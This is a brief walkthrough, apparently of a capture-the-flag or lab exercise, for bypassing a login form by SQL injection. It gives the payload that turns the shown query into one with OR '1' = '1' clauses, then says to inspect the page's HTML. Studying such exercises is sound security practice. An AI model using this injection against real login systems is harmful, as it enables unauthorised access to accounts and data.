Submitting some username and password displays the query being executed:
SELECT * FROM users WHERE name='user' AND password='pass'
Enter the details so that the queriy would look like this:
SELECT * FROM users WHERE name='user' OR '1' = '1' AND password='pass' OR '1' = '1'
On success, inspect and view the HTML code.